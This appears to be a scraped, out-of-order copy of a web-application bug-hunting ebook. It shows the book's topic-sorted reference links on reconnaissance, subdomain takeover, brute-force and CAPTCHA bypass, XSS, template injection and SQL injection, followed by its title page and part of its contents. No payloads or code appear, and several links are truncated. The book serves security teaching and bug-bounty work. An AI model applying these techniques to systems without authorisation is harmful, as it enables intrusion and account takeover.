This ebook develop into a more comprehensive and complete.
We do not deny that this article is certainly still have many shortcomings and needs
a lot of additional information. On these considerations, we would be very grateful if the
readers can also provide feedback and improvements to these writings through
e-mail info@alfursan.id ,

Weather | 204
LIST REFERENCES
0x01. Reconnaissance
• Default Passwords: https://cirt.net/passwords
• Default Password List: http://www.phenoelit.org/dpl/dpl.html
• Reverse IP Lookup: https://www.yougetsignal.com/tools/web-sites-on-web-server/
• Fast subdomains enumeration tool for penetration testers:
https://github.com/aboul3la/Sublist3r
• Amass - In-depth and Network Mapping DNS Enumeration: https://github.com/caffix/amass
• Amass - In-depth and Network Mapping DNS Enumeration: https://github.com/OWASP/Amass
• Subfinder - subdomain discovery tool that discovers valid subdomains for websites:
https://github.com/subfinder/subfinder
• Open Source (GPL) web server scanner: https://github.com/sullo/nikto
• Bug Hunter Methodology v3 by Jason Haddix: https://docs.google.com/presentation/d/1R3eqlt31sL7_rj2f1_vGEqqb7hcx4vxX_L7E23lJVo/edit
• [Video] Bug Hunter Methodology v3 by Jason Haddix:
https://youtube.com/watch?v=Qw1nNPiH_Go
0x02. Sub-Domain Takeover
• Sub-domains Guide Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers
• Sub-domains Takeover Basics: https://0xpatrik.com/subdomain-takeover-basics/
• Broken Link Hijacking: https://edoverflow.com/2017/broken-link-hijacking/
• Sub-domains Takeover proofs (Github, Amazon S3, Heroku, and Readme.io):

https://0xpatrik.com/takeover-proofs/
• Sub-domains Takeover Principles: https://blog.sweepatic.com/subdomain-takeover-principles/
• Sub-domains Takeover at Starbucks (via Microsoft Azure): https://0xpatrik.com/subdomaintakeover-starbucks/
• Sub-domains Takeover Detection with Aquatone: https://michenriksen.com/blog/subdomaintakeover-detection-with-aquatone/

Weather | 205
• Hostile Takeover Sub-domains using Heroku, GitHub, and more:
https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdeskmore/
• Sub-domains Takeover on Jobsycombinator: https://noobsec.org/project/2018-11-06subdomain-takeover-on-jobsycombinator/
• How an unclaimed AWS S3 Bucket escalates to Sub-domain Takeover:
https://www.we45.com/blog/how-an-unclaimed-aws-s3-bucket-escalates-to-subdomaintakeover
• Sub-domains Takeover via Unsecured S3 Bucket:
https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/
• Sub-domains Blog Takeover of Snapchat (via Tumblr): https://hackernoon.com/subdomaintakeover-of-blog-snapchat-com-60860de02fe7
0x03. Interceptor and Forwarders Traffic Data Web-Based Applications
• Installing Burp's CA certificate:
https://portswigger.net/burp/documentation/desktop/tools/proxy/options/installing-cacertificate
• Installing Burp Suite CA Certificate in Firefox:
https://support.portswigger.net/customer/portal/articles/1783087-installing-burp-s-cacertificate-in-firefox
• Installing Burp's CA Certificate in Chrome:
https://support.portswigger.net/customer/portal/articles/1783085-installing-burp-s-cacertificate-in-chrome
• Installing Burp's CA Certificate in Chrome on Linux:
https://support.portswigger.net/customer/portal/articles/2956765-installing-burp-s-cacertificate-in-chrome-on-linux
0x04. Method Basic Concepts on HTTP GET and HTTP POST
• Reference of HTTP Methods: https://www.w3schools.com/tags/ref_httpmethods.asp
• Hypertext Transfer Protocol: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol

Weather | 206
0x05. Information Disclosure via Search Engine
• How Search Engines Gather and Organize Data: https://www.dummies.com/web-designdevelopment/search-engine-optimization/how-searc
• Bot Directory: https://www.distilnetworks.com/bot-directory/category/search-engine/
• List All Users Agents from Top Search Engines: https://perishablepress.com/list-all-user-agentstop-search-engines/
• Google Dork Query: https://whatis.techtarget.com/definition/Google-dork-query
• Google Hacking Database: https://www.exploit-db.com/google-hacking-database
• Block search indexing with 'noindex': https://support.google.com/webmasters/answer/93710
• Microsoft Yammer OAuth Token Bypass Vulnerability: https://www.vulnerabilitydb.com/?q=articles/2013/08/04/microsoft-yammer-%E2%80
• Information Disclosure at PayPal via Search Engine: http://firstsight.me/2017/12/informationdisclosure-at-paypal-and-xoom-paypal-acquisitio
• How I used a simple Google query to mine passwords from dozens of public Trello boards:
https://hakin9.org/how-i-used-a-simple-google-query-to-mine-passwords-from-dozens-ofpublic-trello-boards/
0x06 Brute Force Attack
• Definition of Brute Force Attack: https://www.kaspersky.com/resource-center/definitions/bruteforce-attack
• What is a Brute Force Attack: https://www.varonis.com/blog/brute-force-attack/
• Bypassing Google's authentication to Access Their internal Admin Panels:

https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-adminpanels-12acd3d821e3
• Vulnerable Demonstration Site by Acunetix: http://testphp.vulnweb.com/login.php
• Damn Vulnerable Web Application: http://www.dvwa.co.uk/
• Every Hacked Facebook Account with Bypassing the OTP via Brute Force Attack:
http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html
• [Video] Every Hacked Facebook Account with Bypassing the OTP via Brute Force Attack:
https://www.youtube.com/watch?v=U3Of-jF1nWo

Weather | 207
• The 'Basic' HTTP Authentication Scheme: https://tools.ietf.org/html/rfc7617
• The general HTTP authentication framework: https://developer.mozilla.org/enUS/docs/Web/HTTP/Authentication
• HTTP Authentication: https://www.httpwatch.com/httpgallery/authentication/
• A set of HTTP / 1.1 features: https://jigsaw.w3.org/HTTP/
• Payload Processing (Rules and Encoding) at Burp Suite:
https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/processing#payl oad-processing rules'
• HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite:
http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-forceattacks-with-burp-suite/
• Use the Burp Suite to brute-force the HTTP Basic authentication: https://securityonline.info/useburp-suite-brute-force-http-basic-authentication
• Veris - Bypassing CAPTCHA by Removing the CAPTCHA Parameters:
• Instacart - Bypassing Brute Force Attack Prevention by using Mobile Request:
• Dashlance - Login Attempt Bypass (Bypass Throttling) by Adding the X-Forwarded-For header:
• X-Forwarded-For header: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/XForwarded-For
• Asus - Bypassing CAPTCHA by using Mobile API: http://firstsight.me/2017/12/lack-of-binaryprotection-at-asus-vivo-baby-and-hivivo-for-andr
• Weblate - Bypassing Brute Force Protection by Changing the IP Address:
0x07. Check for Account Enumeration
• OWASP Testing Guide - Testing for User Enumeration and guessable User Account:
https://www.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Accou nt_ (OWASP-AT-002)
• About User Enumeration: https://blog.rapid7.com/2017/06/15/about-user-enumeration/
• [Infogram] User Enumeration via Forgot Password Feature:

Weather | 208
• [Veris] User Enumeration via Error Message at Login Form:
• [Hackerone] Enumeration of Users via Registration (Sign Up) Feature:
• [Weblate] User Enumeration when Adding Email to Account:
• [Xoom] Account Enumeration via Search Engine: http://firstsight.me/2017/12/informationdisclosure-at-paypal-and-xoom-paypal-acquisition-
12.8. Reference for Common Account and Password Checking
• [OwnCloud] password complexity not enforced on password Change:
• [Legal Robot] Bypass 8 chars password complexity with 6 chars only due to insecure password reset functionaliy: https://hackerone.com/re
• [Legal Robot] Password Complexity ignores Empty Spaces:
• Authentication Cheat Sheet by OWASP:
https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html
0x09. Cross Site Scripting
• Rapid7 tcell application security report:
https://www.rapid7.com/globalassets/_pdfs/whitepaperguide/rapid7-tcell-application-securityreport.pdf
• OWASP TOP 10 2017: https://www.owasp.org/images/7/72/OWASP_Top_102017_%28en%29.pdf.pdf
• OWASP TOP 10 2017 A7-Cross Site Scripting: https://www.owasp.org/index.php/Top_102017_A7-Cross-Site_Scripting_(XSS)
• Cross Site Scripting: https://portswigger.net/web-security/cross-site-scripting
• Cross Site Scripting: https://www.veracode.com/security/xss
• Testing For Reflected Cross Site Scripting:
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-
001)

Weather | 209
• Testing For Stored Cross Site Scripting:
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
• Testing For DOM Cross Site Scripting: https://www.owasp.org/index.php/Testing_for_DOMbased_Cross_site_scripting_(OTG-CLIENT-001)
• Stored Cross Site Scripting Attacks: https://www.imperva.com/learn/application-security/crosssite-scripting-xss-attacks/
• Reflected Cross Site Scripting: https://shieldfy.io/security-wiki/cross-site-scripting-xss/reflectedxss
• DOM Cross Site Scripting: https://medium.com/iocscan/dom-based-cross-site-scripting-dom-xss3396453364fd
• Reflected XSS Shopify: https://hackerone.com/reports/422707
• Stored XSS on Snapchat: https://medium.com/@mrityunjoy/stored-xss-on-snapchat5d704131d8fd
• Persistent DOM-based XSS in https://help.twitter.com via localStorage:
• XSS Filter Evasian Cheat Sheet:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
• Blind XSS On Panel Internal Tokopedia: https://noobsec.org/project/2018-11-23-blind-xsspada-internal-panel-tokopedia/
0x10. Content Injection
• Content Spoofing: https://www.owasp.org/index.php/Content_Spoofing
• [SEMRush] Error Page Content Spoofing or Text Injection:
• [LocalTapiola] Error Page Content Spoofing or Text Injection:
• [Harvest] Text and HTML Injection at First and Last Name Parameters:
• [Slack] HTML Injection Inside Slack Promotional Emails: https://hackerone.com/reports/321029
• [Infogram] HTML Injection at empoyee ID: https://hackerone.com/reports/283742
0x11. Server-Side Template Injection

Weather | 210
• Server-Side Template Injection: RCE for the modern webapp -
https://portswigger.net/kb/papers/serversidetemplateinjection.pdf
• Server-Side Template Injection Introduction & Example -
https://www.netsparker.com/blog/web-security/server-side-template-injection/
• Exploiting Server Side Template Injection With Tplmap -
https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf
• Payload All The Things - Template Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Templat e% 20Injection
• Uber.com may RCE by Flask Jinja2 Template Injection - https://hackerone.com/reports/125980
• [Intel] Bug Hunting in Web App - https://www.owasp.org/images/c/ce/OWASPLondon20170928-Suleman_Malik-PDF.pdf
• Tplmap - https://github.com/epinna/tplmap
0x12. Host Header Injection
• Web Servers and the Host Header: https://serversforhackers.com/c/webservers-host-header
• What Is a Host Header? https://www.itprotoday.com/devops-and-software-development/whathost-header
• Practical HTTP Host Header Attacks: https://www.skeletonscribe.net/2013/05/practical-httphost-header-attacks.html
• Host Header Injection: https://lightningsecurity.io/blog/host-header-injection/
• [Whisper] Host Header Injection - Redirection: https://hackerone.com/reports/94637
• [Mavenlink] password reset link Allows injection redirect to malicious URL:

0x13. SQL Injection
• Akamai Report Q4 2017 State of The Internet Security Reports
https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q4-2017-stateof-the-internet-security-report.pdf
• OWASP TOP 10 2017
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

Weather | 211
• OWASP TOP 10 2017 - A1 Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
• SQL Injection Cheat Sheet
https://portswigger.net/web-security/sql-injection/cheat-sheet
• Blind SQL Injection Tutorial:
http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html
• How to Prevent SQL injection Attacks
https://www.wordfence.com/learn/how-to-prevent-sql-injection-attacks/
• What is SQL Injection (SQLi) and How to Prevent It
https://www.acunetix.com/websitesecurity/sql-injection/
• [Nutanix] SQL injection on Bootcamp
https://blog.securitybreached.org/2018/09/08/sqli-bootcampnutanix-com-bug-bounty-poc/
• [Zomato] Boolean Blind SQL injection
• PoC - Blind SQL Injection throught Boolean User Agent
https://medium.com/@frostnull1337/sql-injection-through-user-agent-44a1150f6888
• [Starbucks] Time-Based Blind SQL Injection
https://timeofcheck.com/time-based-blind-sqli-on-news-starbucks-com/
• Methodology SQL Injection Auhtentication Bypass
https://support.portswigger.net/customer/portal/articles/2791007Methodology_SQL_Injection_Authentication_.html
• SQL injection Auhtentication Cheat Sheet Bypass
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
• repository SqlMap
https://github.com/sqlmapproject/sqlmap


Bughunting101 English Version

Caricato da

Informazioni sul documento

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Bughunting101 English Version

Caricato da

Copyright:

Formati disponibili

Weather | i

BUG HUNT I NG 101

( Web Application Security)

40+ examples of real cases with various techniques

40.000+ USD have been paid

Equipped with basic explanations

By: Yoko Kho and Faisal Yudo Hernawan, 2019

Bug Hunting 101 - First Edition free | https://alfursan.id

of electronic book-themed web-based application testing is completed.

As simple information, this book is one book that is expected to be

applied and continue to strive to provide improvements and additional material to

Writer, Yoko Kho and Faisal Yudo Hernawan, 2019

Personal Blog: http://firstsight.me

Linkedin: https://id.linkedin.com/in/config & https://id.linkedin.com/in/faisal-yudo-hernawan

Twitter: https://twitter.com/YoKoAcc & https://twitter.com/jrs_faisal

Medium: https://medium.com/@YoKoKho & https://medium.com/@FaisalYudo

Bug Hunting 101 - First Edition free | https://alfursan.id

Version date Summary Initials

October 14, 2019 / Bug Hunting 101 (Web Application Security)

Yoko Kho Author

Faisal Yudo Hernawan Author

Azhar Abdussami Research team

Tomi Ashari Research team

Bug Hunting 101 - First Edition free | https://alfursan.id

FOREWORD ................................................ .................................................. ii .................................

Document History ................................................ .................................................. iii .................................

Composer ................................................. .................................................. iii ..............................................

Table of contents ................................................ .................................................. iv ................................................

List of picture ................................................ .................................................. ...................................... xi

ABSTRACT................................................. .................................................. ............................................ xviii

CHANGELOG ................................................. .................................................. xix ........................................

1. INTRODUCTION ............................................... .................................................. ................................... 1

1.1. Background ................................................ .................................................. ........................... 1

1.2. Scope ................................................ .................................................. ........................... 3

2. VIEWPOINT SECURITY TESTING ............................................ .................................................. ... 4

2.1. Vulnerability Assessment ................................................ .................................................. .......... 6

2.2. Penetration Test ................................................ .................................................. ........................ 7

2.3. Security Assessment ................................................ .................................................. .................. 8

3. APPROACH GUIDES .............................................. .................................................. ................... 11

4. TEST SUMMARY BASIS ............................................. .................................................. ....................... 13

5. RECONNAISSANCE ............................................... .................................................. ............................ 20

5.1. Finding Sub-Domain of A Target ........................................... ......................................... 21

5.1.1. Reverse IP Lookup Method (Use of the Same Server) ........................................ 21

5.1.2. Sub-Domain Enumeration with Automation Tools ........................................... ......... 23

5.2. Seeing the state of the Target Sub-Domain ........................................... ................................... 27

5.2.1. Directory / File Brute Force ............................................. ................................................ 27

5.3. Conclusion Basic Reconnaissance Phase .............................................. .................................. 29

5.4. Reference Reconnaissance ................................................ .................................................. ....... 30

6. SUB-DOMAIN Takeover ............................................ .................................................. ..................... 31

Bug Hunting 101 - First Edition free | https://alfursan.id

6.1. The Basics of Sub-Domain Takeover ............................................ ....................................... 31

6.2. Basic Concepts Sub-Domain Takeover ............................................ ............................................ 31

6.3. Impact of Sub-Domain Takeover ............................................. .................................................. .. 35

6.4. Step Execution Sub-Domain Takeover ............................................ ...................................... 35

6.4.3. Execution of the Second Order Domain ............................................. .......................... 42

6.5. Reference Sub-Domain Takeover ............................................. .................................................. 43

7. INTERCEPTOR & FORWARDER TRAFFIC WEB APPLICATION TOOLS ......................................... ......... 45

7.3. Intercept Traffic Data on Web-Based Applications - Track HTTP ....................................... 50

7.4. Intercept Traffic Data on Web-Based Applications - Track HTTPS ...................................... 53

7.5. Burp Suite Installation Reference CA on Multiple Browser .......................................... ............. 56

8. BASIC CONCEPT AND METHOD IN HTTP GET POST ........................................ .............................. 57

9. INFORMATION DISCLOSURE VIA SEARCH ENGINE ........................................... ................................. 59

9.1. Discussion Technique - First Case - Case Yammer .......................................... ................... 60

9.2. Google Dork glimpse ............................................... .................................................. .................. 62